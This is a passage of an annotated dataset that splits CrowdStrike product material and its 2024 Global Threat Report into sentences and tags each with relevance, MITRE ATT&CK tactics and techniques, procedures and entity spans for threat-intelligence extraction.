"crowdstrike-50_crowdstrike_report-p2-s11-5a5127", "source": "crowdstrike", "doc_id": "50_crowdstrike_report", "page_number": 2, "sentence_id": 11, "context_before": "By leveraging industry-first unified visibility across cloud environments, identities, and endpoints, CrowdStrike experts effectively hunt threats across domains, monitoring for compromised users in cloud attacks and tracking lateral movement between cloud and endpoint.", "sentence_text": "Falcon Adversary OverWatch breaks down silos to hunt adversaries everywhere, significantly reducing complexity and accelerating response time for customers.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-50_crowdstrike_report-p2-s12-7b9f11", "source": "crowdstrike", "doc_id": "50_crowdstrike_report", "page_number": 2, "sentence_id": 12, "context_before": "Falcon Adversary OverWatch breaks down silos to hunt adversaries everywhere, significantly reducing complexity and accelerating response time for customers.", "sentence_text": "Leveraging the AI-native CrowdStrike Falcon® platform and CrowdStrike’s world-class threat intelligence, Falcon Adversary OverWatch provides elite 24/7 threat hunting to stop breaches and protect your organization.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-50_crowdstrike_report-p2-s13-9c2c32", "source": "crowdstrike", "doc_id": "50_crowdstrike_report", "page_number": 2, "sentence_id": 13, "context_before": "Leveraging the AI-native CrowdStrike Falcon® platform and CrowdStrike’s world-class threat intelligence, Falcon Adversary OverWatch provides elite 24/7 threat hunting to stop breaches and protect your organization.", "sentence_text": "Key capabilities\nCross-domain threat hunting across identity, cloud and endpoint • Protection for cloud environments: Stop cloud attacks with the world’s most complete cloud threat hunting service within CrowdStrike Falcon® Cloud Security unified cloud detection and response (CDR).", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-50_crowdstrike_report-p2-s14-171835", "source": "crowdstrike", "doc_id": "50_crowdstrike_report", "page_number": 2, "sentence_id": 14, "context_before": "Key capabilities\nCross-domain threat hunting across identity, cloud and endpoint • Protection for cloud environments: Stop cloud attacks with the world’s most complete cloud threat hunting service within CrowdStrike Falcon® Cloud Security unified cloud detection and response (CDR).", "sentence_text": "Expand visibility into the Microsoft Azure control plane, along with AWS and Google Cloud cloud runtime environments.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-50_crowdstrike_report-p2-s15-1e2e6e", "source": "crowdstrike", "doc_id": "50_crowdstrike_report", "page_number": 2, "sentence_id": 15, "context_before": "Expand visibility into the Microsoft Azure control plane, along with AWS and Google Cloud cloud runtime environments.", "sentence_text": "Monitor for compromised users and lateral movement between cloud and endpoint.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-50_crowdstrike_report-p2-s16-f99473", "source": "crowdstrike", "doc_id": "50_crowdstrike_report", "page_number": 2, "sentence_id": 16, "context_before": "Monitor for compromised users and lateral movement between cloud and endpoint.", "sentence_text": "• Protection for identities: Defend against identity threats with Falcon Adversary OverWatch’s identity threat hunting and credential monitoring.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-50_crowdstrike_report-p2-s17-4e7645", "source": "crowdstrike", "doc_id": "50_crowdstrike_report", "page_number": 2, "sentence_id": 17, "context_before": "• Protection for identities: Defend against identity threats with Falcon Adversary OverWatch’s identity threat hunting and credential monitoring.", "sentence_text": "Threat hunters proactively contain and alert on identity-based attacks, minimizing further damage.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-50_crowdstrike_report-p2-s18-ded78d", "source": "crowdstrike", "doc_id": "50_crowdstrike_report", "page_number": 2, "sentence_id": 18, "context_before": "Threat hunters proactively contain and alert on identity-based attacks, minimizing further damage.", "sentence_text": "Monitor criminal forums for stolen credentials and force multifactor authentication (MFA) challenges.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-50_crowdstrike_report-p2-s19-44aa6f", "source": "crowdstrike", "doc_id": "50_crowdstrike_report", "page_number": 2, "sentence_id": 19, "context_before": "Monitor criminal forums for stolen credentials and force multifactor authentication (MFA) challenges.", "sentence_text": "• Protection for endpoints: Falcon Adversary OverWatch threat hunters relentlessly pursue adversaries targeting your endpoints.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-50_crowdstrike_report-p2-s20-d10f1a", "source": "crowdstrike", "doc_id": "50_crowdstrike_report", "page_number": 2, "sentence_id": 20, "context_before": "• Protection for endpoints: Falcon Adversary OverWatch threat hunters relentlessly pursue adversaries targeting your endpoints.", "sentence_text": "Fortify your defense against sophisticated identity attacks with real-time protection and accelerated response.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-50_crowdstrike_report-p2-s21-ade2ef", "source": "crowdstrike", "doc_id": "50_crowdstrike_report", "page_number": 2, "sentence_id": 21, "context_before": "Fortify your defense against sophisticated identity attacks with real-time protection and accelerated response.", "sentence_text": "World-class expertise powered by AI • Elite threat hunters: CrowdStrike’s threat hunters are best-in-class at detecting the stealthiest adversaries, including those exploiting legitimate tools for their attacks.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-50_crowdstrike_report-p2-s22-6f9cf2", "source": "crowdstrike", "doc_id": "50_crowdstrike_report", "page_number": 2, "sentence_id": 22, "context_before": "World-class expertise powered by AI • Elite threat hunters: CrowdStrike’s threat hunters are best-in-class at detecting the stealthiest adversaries, including those exploiting legitimate tools for their attacks.", "sentence_text": "These elite threat hunters proactively identify novel threats in real time across the entire CrowdStrike customer base and instantly deploy new detections on your behalf.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-50_crowdstrike_report-p2-s23-05b021", "source": "crowdstrike", "doc_id": "50_crowdstrike_report", "page_number": 2, "sentence_id": 23, "context_before": "These elite threat hunters proactively identify novel threats in real time across the entire CrowdStrike customer base and instantly deploy new detections on your behalf.", "sentence_text": "• Vulnerability intelligence: Find and prioritize vulnerabilities with real-time National Vulnerability Database updates.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-50_crowdstrike_report-p3-s24-d11737", "source": "crowdstrike", "doc_id": "50_crowdstrike_report", "page_number": 3, "sentence_id": 24, "context_before": "• Vulnerability intelligence: Find and prioritize vulnerabilities with real-time National Vulnerability Database updates.", "sentence_text": "Falcon Adversary OverWatch: Cross-Domain Threat Hunting Native intelligence to speed up decision-making • Adversary insights: Falcon Adversary OverWatch tracks 230+ nation-state, eCrime and hacktivist adversaries.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-50_crowdstrike_report-p3-s25-eeeda6", "source": "crowdstrike", "doc_id": "50_crowdstrike_report", "page_number": 3, "sentence_id": 25, "context_before": "Falcon Adversary OverWatch: Cross-Domain Threat Hunting Native intelligence to speed up decision-making • Adversary insights: Falcon Adversary OverWatch tracks 230+ nation-state, eCrime and hacktivist adversaries.", "sentence_text": "Identify the adversaries targeting your organization, and gain insights into their intent and capabilities.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-50_crowdstrike_report-p3-s26-94a0c5", "source": "crowdstrike", "doc_id": "50_crowdstrike_report", "page_number": 3, "sentence_id": 26, "context_before": "Identify the adversaries targeting your organization, and gain insights into their intent and capabilities.", "sentence_text": "• Automated malware sandbox: Safely detonate suspicious files in a secure environment.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-50_crowdstrike_report-p3-s27-554a8e", "source": "crowdstrike", "doc_id": "50_crowdstrike_report", "page_number": 3, "sentence_id": 27, "context_before": "• Automated malware sandbox: Safely detonate suspicious files in a secure environment.", "sentence_text": "• Context-aware indicators: CrowdStrike Falcon modules are enriched with built-in intelligence and context-aware indicators.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-50_crowdstrike_report-p3-s28-84aebb", "source": "crowdstrike", "doc_id": "50_crowdstrike_report", "page_number": 3, "sentence_id": 28, "context_before": "• Context-aware indicators: CrowdStrike Falcon modules are enriched with built-in intelligence and context-aware indicators.", "sentence_text": "Examples of Falcon Adversary OverWatch cross-domain threat hunting • Cloud as a gateway to endpoints: An adversary used valid credentials to achieve execution on Windows endpoints via a third-party cloud management tool.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059.009", "name": "Cloud API" }, { "id": "T1078.004", "name": "Cloud Accounts" } ], "procedure": "adversary used valid credential to achieve execution", "entities": [ { "text": "adversary ", "start": 105, "end": 115, "label": "MalwareTool" }, { "text": "used valid credentials to achieve execution", "start": 115, "end": 158, "label": "Action" }, { "text": "Windows endpoints via a third-party cloud management tool.", "start": 162, "end": 220, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-50_crowdstrike_report-p3-s29-2fbb9b", "source": "crowdstrike", "doc_id": "50_crowdstrike_report", "page_number": 3, "sentence_id": 29, "context_before": "Examples of Falcon Adversary OverWatch cross-domain threat hunting • Cloud as a gateway to endpoints: An adversary used valid credentials to achieve execution on Windows endpoints via a third-party cloud management tool.", "sentence_text": "They proceeded to use PowerShell to download an unknown executable to Windows endpoints.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1059.001", "name": "PowerShell" } ], "procedure": "usage of powershell to download (.exe)s", "entities": [ { "text": "They ", "start": 0, "end": 5, "label": "ThreatActor" }, { "text": "use PowerShell to download", "start": 18, "end": 44, "label": "Action" } ] }, { "uid": "crowdstrike-50_crowdstrike_report-p3-s30-d6bb17", "source": "crowdstrike", "doc_id": "50_crowdstrike_report", "page_number": 3, "sentence_id": 30, "context_before": "They proceeded to use PowerShell to download an unknown executable to Windows endpoints.", "sentence_text": "Falcon Adversary OverWatch detected the activity in real time and alerted the customer for immediate response.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-50_crowdstrike_report-p3-s31-3c3fda", "source": "crowdstrike", "doc_id": "50_crowdstrike_report", "page_number": 3, "sentence_id": 31, "context_before": "Falcon Adversary OverWatch detected the activity in real time and alerted the customer for immediate response.", "sentence_text": "• Identity attack on the cloud: During an eCrime intrusion, a Falcon Adversary OverWatch threat hunter used data from CrowdStrike Falcon Cloud Security to support the analysis.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-50_crowdstrike_report-p3-s32-2f3522", "source": "crowdstrike", "doc_id": "50_crowdstrike_report", "page_number": 3, "sentence_id": 32, "context_before": "• Identity attack on the cloud: During an eCrime intrusion, a Falcon Adversary OverWatch threat hunter used data from CrowdStrike Falcon Cloud Security to support the analysis.", "sentence_text": "The adversary was identified while attempting to establish persistence in the cloud by adding an additional federated domain.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" }, { "id": "TA0004", "name": "Privilege Escalation" } ], "techniques": [ { "id": "T1098.001", "name": "Additional Cloud Credentials" } ], "procedure": "adversary established persistence by adding an additional federated domain", "entities": [ { "text": "adversary ", "start": 4, "end": 14, "label": "MalwareTool" }, { "text": "establish persistence", "start": 49, "end": 70, "label": "Action" }, { "text": "adding ", "start": 87, "end": 94, "label": "Action" } ] }, { "uid": "crowdstrike-50_crowdstrike_report-p3-s33-8a5657", "source": "crowdstrike", "doc_id": "50_crowdstrike_report", "page_number": 3, "sentence_id": 33, "context_before": "The adversary was identified while attempting to establish persistence in the cloud by adding an additional federated domain.", "sentence_text": "In this instance, the threat hunter provided essential intelligence that enabled the customer's incident response team to quickly contain the incident.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-50_crowdstrike_report-p3-s34-f9ffa8", "source": "crowdstrike", "doc_id": "50_crowdstrike_report", "page_number": 3, "sentence_id": 34, "context_before": "In this instance, the threat hunter provided essential intelligence that enabled the customer's incident response team to quickly contain the incident.", "sentence_text": "• Identity attack on endpoints: A Falcon Adversary OverWatch threat hunter used both identity and endpoint data to inform their analysis while hunting an eCrime intrusion.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-50_crowdstrike_report-p3-s35-32935c", "source": "crowdstrike", "doc_id": "50_crowdstrike_report", "page_number": 3, "sentence_id": 35, "context_before": "• Identity attack on endpoints: A Falcon Adversary OverWatch threat hunter used both identity and endpoint data to inform their analysis while hunting an eCrime intrusion.", "sentence_text": "The threat hunter was able to understand the adversary’s identity reconnaissance efforts, the tools they used on the endpoint and their credential dump attempts.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-50_crowdstrike_report-p3-s36-f044fa", "source": "crowdstrike", "doc_id": "50_crowdstrike_report", "page_number": 3, "sentence_id": 36, "context_before": "The threat hunter was able to understand the adversary’s identity reconnaissance efforts, the tools they used on the endpoint and their credential dump attempts.", "sentence_text": "Due to this comprehensive insight, the customer rapidly disabled the compromised accounts and contained the intrusion.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-50_crowdstrike_report-p3-s37-12ab70", "source": "crowdstrike", "doc_id": "50_crowdstrike_report", "page_number": 3, "sentence_id": 37, "context_before": "Due to this comprehensive insight, the customer rapidly disabled the compromised accounts and contained the intrusion.", "sentence_text": "Attend a hands-on workshop About CrowdStrike with the world’s most advanced cloud-native platform for protecting critical areas of enterprise risk — endpoints and cloud workloads, identity and data.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-50_crowdstrike_report-p3-s38-e6eb18", "source": "crowdstrike", "doc_id": "50_crowdstrike_report", "page_number": 3, "sentence_id": 38, "context_before": "Attend a hands-on workshop About CrowdStrike with the world’s most advanced cloud-native platform for protecting critical areas of enterprise risk — endpoints and cloud workloads, identity and data.", "sentence_text": "Request a demo", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p2-s2-e0a1bb", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 2, "sentence_id": 2, "context_before": "G LO B A L T H R E AT R E P O R T", "sentence_text": "Foreword\nThe 2024 edition of the CrowdStrike Global Threat Report arrives at a pivotal moment for our global community of protectors.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p2-s3-05b6ae", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 2, "sentence_id": 3, "context_before": "Foreword\nThe 2024 edition of the CrowdStrike Global Threat Report arrives at a pivotal moment for our global community of protectors.", "sentence_text": "The speed and ferocity of cyberattacks continue to accelerate as adversaries compress the time between initial entry, lateral movement and breach.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0008", "name": "Lateral Movement" } ], "techniques": null, "procedure": "Adversaries compress the time between initial entry, lateral movement, and breach.", "entities": [ { "text": "adversaries", "start": 65, "end": 76, "label": "ThreatActor" }, { "text": "compress the time between initial entry, lateral movement and breach", "start": 77, "end": 145, "label": "Action" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p2-s4-c14ea5", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 2, "sentence_id": 4, "context_before": "The speed and ferocity of cyberattacks continue to accelerate as adversaries compress the time between initial entry, lateral movement and breach.", "sentence_text": "These trends are driving a tectonic shift in the security landscape and the world.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p2-s5-2a646a", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 2, "sentence_id": 5, "context_before": "These trends are driving a tectonic shift in the security landscape and the world.", "sentence_text": "The “good enough” approach to cybersecurity is simply no longer good enough for modern threats.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p2-s6-4e74d6", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 2, "sentence_id": 6, "context_before": "The “good enough” approach to cybersecurity is simply no longer good enough for modern threats.", "sentence_text": "As organizations increasingly move business to the cloud, adversaries are advancing their capabilities to exploit this, and abuse features unique to the cloud.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587", "name": "Develop Capabilities" } ], "procedure": "adversaries are advancing their capabilities and abuse features of cloud", "entities": [ { "text": "advancing ", "start": 74, "end": 84, "label": "Action" }, { "text": "adversaries ", "start": 58, "end": 70, "label": "MalwareTool" }, { "text": "abuse ", "start": 124, "end": 130, "label": "Action" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p2-s7-5ad4e3", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 2, "sentence_id": 7, "context_before": "As organizations increasingly move business to the cloud, adversaries are advancing their capabilities to exploit this, and abuse features unique to the cloud.", "sentence_text": "We continue to see identity-based attacks take center stage, as adversaries focus on social engineering attacks that bypass multifactor authentication.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566", "name": "Phishing" } ], "procedure": "adversaries focus on social engineering attacks", "entities": [ { "text": "adversaries ", "start": 64, "end": 76, "label": "MalwareTool" }, { "text": " social engineering attacks", "start": 84, "end": 111, "label": "Action" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p2-s8-239eac", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 2, "sentence_id": 8, "context_before": "We continue to see identity-based attacks take center stage, as adversaries focus on social engineering attacks that bypass multifactor authentication.", "sentence_text": "We are entering an era of a cyber arms race where AI will amplify the impact for both the security professional and the adversary.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1588.002", "name": "Tool" } ], "procedure": "AI will amplify the impact of adversaries", "entities": [ { "text": "adversary", "start": 120, "end": 129, "label": "MalwareTool" }, { "text": "amplify the impact", "start": 58, "end": 76, "label": "Action" }, { "text": "AI", "start": 50, "end": 52, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p2-s9-e2cbe6", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 2, "sentence_id": 9, "context_before": "We are entering an era of a cyber arms race where AI will amplify the impact for both the security professional and the adversary.", "sentence_text": "Organizations cannot afford to fall behind, and the legacy technology of yesterday is no match for the speed and sophistication of the modern adversary.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p2-s10-c60dbe", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 2, "sentence_id": 10, "context_before": "Organizations cannot afford to fall behind, and the legacy technology of yesterday is no match for the speed and sophistication of the modern adversary.", "sentence_text": "With the release of the CrowdStrike 2024 Global Threat Report, our elite Counter Adversary Operations team is delivering the actionable intelligence you need to stay ahead of today’s threats and secure your future.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p2-s11-f9a13b", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 2, "sentence_id": 11, "context_before": "With the release of the CrowdStrike 2024 Global Threat Report, our elite Counter Adversary Operations team is delivering the actionable intelligence you need to stay ahead of today’s threats and secure your future.", "sentence_text": "This year’s report provides critical insight and observations into adversary activity, including:\n► The tactics and techniques that adversaries use to exploit gaps in cloud protection ►", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p2-s12-16908a", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 2, "sentence_id": 12, "context_before": "This year’s report provides critical insight and observations into adversary activity, including:\n► The tactics and techniques that adversaries use to exploit gaps in cloud protection ►", "sentence_text": "The continued exploitation of stolen identity credentials and increasingly sophisticated methods adversaries use to gain initial access ►", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1078", "name": "Valid Accounts" } ], "procedure": "adversaries exploit stolen credentials to gain initial access", "entities": [ { "text": "exploitation of stolen identity credentials", "start": 14, "end": 57, "label": "Action" }, { "text": "adversaries ", "start": 97, "end": 109, "label": "MalwareTool" }, { "text": "gain initial access", "start": 116, "end": 135, "label": "Action" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p2-s13-379b8a", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 2, "sentence_id": 13, "context_before": "The continued exploitation of stolen identity credentials and increasingly sophisticated methods adversaries use to gain initial access ►", "sentence_text": "The growing menace of supply chain attacks and exploitation of trusted software to maximize the ROI of attacks ►", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1195", "name": "Supply Chain Compromise" } ], "procedure": "growth of supply chain attacks and exploitation of trusted software", "entities": [ { "text": "supply chain attacks", "start": 22, "end": 42, "label": "Action" }, { "text": "exploitation of trusted software", "start": 47, "end": 79, "label": "Action" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p2-s14-787574", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 2, "sentence_id": 14, "context_before": "The growing menace of supply chain attacks and exploitation of trusted software to maximize the ROI of attacks ►", "sentence_text": "The potential for adversaries to target global elections in a year that has the potential to transform geopolitics around the world for the near future", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p3-s15-86dd17", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 3, "sentence_id": 15, "context_before": "The potential for adversaries to target global elections in a year that has the potential to transform geopolitics around the world for the near future", "sentence_text": "We pioneered the concept of adversary-focused cybersecurity because it’s the best way to protect customers and stop breaches.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p3-s16-7aa845", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 3, "sentence_id": 16, "context_before": "We pioneered the concept of adversary-focused cybersecurity because it’s the best way to protect customers and stop breaches.", "sentence_text": "A secure future requires a strong foundation.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p3-s17-5ea613", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 3, "sentence_id": 17, "context_before": "A secure future requires a strong foundation.", "sentence_text": "This is what we’re delivering with the AI-native CrowdStrike Falcon® XDR platform.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p3-s18-f74fbf", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 3, "sentence_id": 18, "context_before": "This is what we’re delivering with the AI-native CrowdStrike Falcon® XDR platform.", "sentence_text": "I hope you find the CrowdStrike 2024 Global Threat Report informative and inspiring in our shared fight against the adversary.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p4-s20-61f2bc", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 4, "sentence_id": 20, "context_before": "George Kurtz", "sentence_text": "Table of\nContents\nIntroduction 5\nNaming Conventions 8 Threat Landscape Overview 9 2023 Themes 13 Identity-Based and Social Engineering Attacks 13 Adversaries Continue to Develop Cloud-Consciousness 17 Third-Party Relationship Exploitation 20 Vulnerability Landscape: “Under the Radar” Exploitation 24 2023 Israel-Hamas Conflict: Cyber Operations Focus on Disruption and Influence 25 Threats on the 2024 Horizon 32 eCrime Landscape 38 Big Game Hunting 39 eCrime Enablers 45 Targeted eCrime 48 Conclusion 52 Recommendations 54 About CrowdStrike 61", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p5-s21-b67f56", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 5, "sentence_id": 21, "context_before": "Table of\nContents\nIntroduction 5\nNaming Conventions 8 Threat Landscape Overview 9 2023 Themes 13 Identity-Based and Social Engineering Attacks 13 Adversaries Continue to Develop Cloud-Consciousness 17 Third-Party Relationship Exploitation 20 Vulnerability Landscape: “Under the Radar” Exploitation 24 2023 Israel-Hamas Conflict: Cyber Operations Focus on Disruption and Influence 25 Threats on the 2024 Horizon 32 eCrime Landscape 38 Big Game Hunting 39 eCrime Enablers 45 Targeted eCrime 48 Conclusion 52 Recommendations 54 About CrowdStrike 61", "sentence_text": "Introduction\nAs we reflect on the 2023 cyber threat landscape, the theme of stealth prevails.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p5-s22-1e59f2", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 5, "sentence_id": 22, "context_before": "Introduction\nAs we reflect on the 2023 cyber threat landscape, the theme of stealth prevails.", "sentence_text": "Adversaries have faced a hardening attack surface thanks to advancements in threat defense technology and threat awareness, and they have responded by increasingly adopting and relying on techniques that empower them to move faster and evadedetection.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p5-s23-7248a2", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 5, "sentence_id": 23, "context_before": "Adversaries have faced a hardening attack surface thanks to advancements in threat defense technology and threat awareness, and they have responded by increasingly adopting and relying on techniques that empower them to move faster and evadedetection.", "sentence_text": "Unsurprisingly, eCrime persisted as EVIDENCED BY THE 76% INCREASE IN the most pervasive threat across the 2023 threat landscape as adversaries leveraged THE NUMBER OF VICTIMS NAMED ON techniques to maximize stealth, speed and impact.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p5-s24-3e86e2", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 5, "sentence_id": 24, "context_before": "Unsurprisingly, eCrime persisted as EVIDENCED BY THE 76% INCREASE IN the most pervasive threat across the 2023 threat landscape as adversaries leveraged THE NUMBER OF VICTIMS NAMED ON techniques to maximize stealth, speed and impact.", "sentence_text": "Access brokers continued to profit by providing initial access to eCrime threat actors throughout the year, with the number of advertised accesses increasing by 20% from 2022.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": null, "procedure": "Access brokers provide initial access to threat actors.", "entities": [ { "text": "Access brokers", "start": 0, "end": 14, "label": "ThreatActor" }, { "text": "providing initial access to eCrime threat actors", "start": 38, "end": 86, "label": "Action" }, { "text": "eCrime threat actors", "start": 66, "end": 86, "label": "ThreatActor" } ] }, { "uid": "crowdstrike-51_crowdstrike_report-p5-s25-fe30be", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 5, "sentence_id": 25, "context_before": "Access brokers continued to profit by providing initial access to eCrime threat actors throughout the year, with the number of advertised accesses increasing by 20% from 2022.", "sentence_text": "Nation-state adversaries were also active throughout 2023.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p5-s26-d098c6", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 5, "sentence_id": 26, "context_before": "Nation-state adversaries were also active throughout 2023.", "sentence_text": "In other areas of the world, conflict continued to drive nation-state and hacktivist adversary activity.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p5-s27-38d2f0", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 5, "sentence_id": 27, "context_before": "In other areas of the world, conflict continued to drive nation-state and hacktivist adversary activity.", "sentence_text": "In 2023, as the Russia-Ukraine war entered its second year, Russia-nexus adversaries and activity clusters maintained high, sustained levels of activity in support of Russian Intelligence Service intelligence collection, disruptive activity, and information operations (IO) targeting Ukraine and NATO countries.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p6-s28-3dd930", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 6, "sentence_id": 28, "context_before": "In 2023, as the Russia-Ukraine war entered its second year, Russia-nexus adversaries and activity clusters maintained high, sustained levels of activity in support of Russian Intelligence Service intelligence collection, disruptive activity, and information operations (IO) targeting Ukraine and NATO countries.", "sentence_text": "Iran-nexus adversaries and Middle East hacktivist adversaries were also observed pivoting cyber operations in the latter half of the year in alignment with kinetic operations stemming from the 2023 Israel-Hamas conflict.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p6-s29-4a5d55", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 6, "sentence_id": 29, "context_before": "Iran-nexus adversaries and Middle East hacktivist adversaries were also observed pivoting cyber operations in the latter half of the year in alignment with kinetic operations stemming from the 2023 Israel-Hamas conflict.", "sentence_text": "North Korean adversaries maintained a consistently high tempo throughout 2023.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-51_crowdstrike_report-p6-s30-631c34", "source": "crowdstrike", "doc_id": "51_crowdstrike_report", "page_number": 6, "sentence_id": 30, "context_before": "North Korean adversaries maintained a consistently high tempo throughout 2023.", "sentence_text": "Their activity continued to focus on financial gain via cryptocurrency theft and intelligence collection from South Korean and Western organizations, specifically in the academic, aerospace, defense, government, manufacturing, media and technology sectors.", "relevant": "no", "tactic": null, "techniques": null, "procedure": 